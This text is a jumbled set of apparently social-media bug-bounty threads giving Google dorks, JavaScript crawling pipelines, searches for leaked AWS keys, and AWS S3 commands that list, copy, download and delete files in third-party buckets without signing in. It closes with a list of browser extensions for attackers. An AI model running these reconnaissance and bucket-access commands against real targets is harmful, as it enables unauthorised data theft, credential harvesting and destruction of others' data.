Top google Dorking . Thread 🧵:👇 Here is how to find sensitive data issues:. 1) publicly exposed documents :- site:ext:doc | ext:docx | ext:odt | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv. #BugBounty #bugbountytips #infosec.

5) exploit using jsleak . cat test.txt | jsleaks -s -l -k. 6) expoit by nuclei . cat test.txt | nuclei -t credentials-disclosure-all.yaml -c 30.

2) katana. katana -u -d 5 -jc | grep '\.js$' | tee alljs.txt. 3) Crawling with GAU. echo | gau | grep '\.js$' | anew alljs.txt. 4)Refining Results with HTTPX. cat alljs.txt | httpx-toolkit -mc 200 -o test.txt.

Top JS Bugs. Thread 🧵:👇 Here is how to find Exposed :. 1) collect all the js endpoint by lazyegg. - using automatic tools find sensitive data . #BugBounty #bugbountytips #infosec.

join our bug bounty community for additional resource and support

10) continue.aws s3 ls s3://[bucketname] --no-sign-request.aws s3 rm s3://[bucketname]/file.txt --no-sign-request.aws s3 cp s3://[bucketname]/ ./ --recursive --no-sign-request.

9) public searching . GitHub ;- org:target "amazonaws" ,"bucket_name" ,"aws_access_key" , "aws_access_key_id" , "aws_key" ,"aws_secret" , "aws_secret_key" , "S3_BUCKET" .10) Check the access control bugs. aws s3 cp file.txt s3://[bucketname] --no-sign-request.--> used for copy.

7) Hidden S3 URLs with Extensions. ( all urls parsing ). 8) nahamsec tool for bruteforce . 9) public finding sites.

6) Extracting S3 URLs from JavaScript Files using katana . katana -u site. com/ -d 5 -jc | grep '\.js$' | tee alljs.txt.cat alljs.txt | xargs -I {} curl -s {} | grep -oE 'http[s]?://[^"]*\.s3\.amazonaws\.com[^" ]*' | sort -u.

5) Check for the misconfiguration by S3BucketMisconf . cewl -d 3 -w file.txt. s3scanner -bucket-file file.txt -enumerate -threads 10 | grep -aE 'AllUsers: \[.*(READ|WRITE|FULL).*]'.

3) Auto dorking with Dorkeye . 4) What about nuclei and subfinder. subfinder -d -all -silent | nuclei -t /home/bratwork/.local/nuclei-templates/http/technologies/s3-detect.yaml.

:) i have personally used and earned 2500$+ bounty also netherland site have a lot of similar bugs . 2) Google Dorking for AWS S3 Buckets - (site:*.s3.amazonaws.com OR site:*.s3-external-1.amazonaws.com OR site:*.s3.dualstack.us-east-1.amazonaws.com) "target . com".

Top AWS S3 Bugs. Thread 🧵:👇 Here is how to find Exposed . 1) Misconfigured AWS S3 buckets that may expose sensitive data we can manually check by %c0 on the XML error page or Wappalyzer AWS technology . #BugBounty #bugbountytips #infosec.

Thanks, if you get difficulty finding tools Dm for link Bonus: causion This extension are only used for educational purposes and contain js injection, so don't use them on personal browsers . 30) Hackbar - used for advanced payload.

24) S3BucketList — AWS Bucket Finder. 25) D3coder — Encode/Decode Tool. 26) Mitaka — OSINT Search Tool. 27) Vortimo OSINT Tool. 28) knoxss community - find advance xss. 29) APKCombo - find android bugs and informatio.

17) UA Switcher — User-Agent Spoofer. 18) EXIF Viewer Pro — Extract Image Metadata. 19) WaybackURL — Fetch Archived URLs. 20) Shodan — Website Intelligence Tool. 21) EndPointer — Find Sensitive URLs. 22) YesWeHack VDP Finder. 23) Proton vpn - for hiding your ip and advance use.

13) FindSomething — Hidden Parameter Finder. - 14) .git Finder — Information Disclosure. 15) Open Multiple URLs — Bulk URL Opener. 16) Dark Reader — Eye Protection.

8) — Finding Emails on Websites. 9) HackTools — Payload Generator. - 10) EditThisCookie — Advanced Cookie Editor. 11) WebRTC Protect — Protect IP Leak. 12) Link Gopher — Extract All Links.

4) Freedium Extension - Read premium medium post for free . 5) FoxyProxy — Proxy Management for Burp Suite. 6) Wappalyzer , Buildwith — Technology Detector. 7) Temp-Mail — Disposable Email Service.

2) ParamScan -> find reflected parameters. 3) TruffleHog — Finding Hidden API Keys.

Top Browser Extensions . Thread 🧵:👇 Here is 30 Best extension used for attackers:. 1) nuclei-ai-extension -> Browser Extension for Rapid Nuclei Template Generation. #BugBounty #bugbountytips #infosec.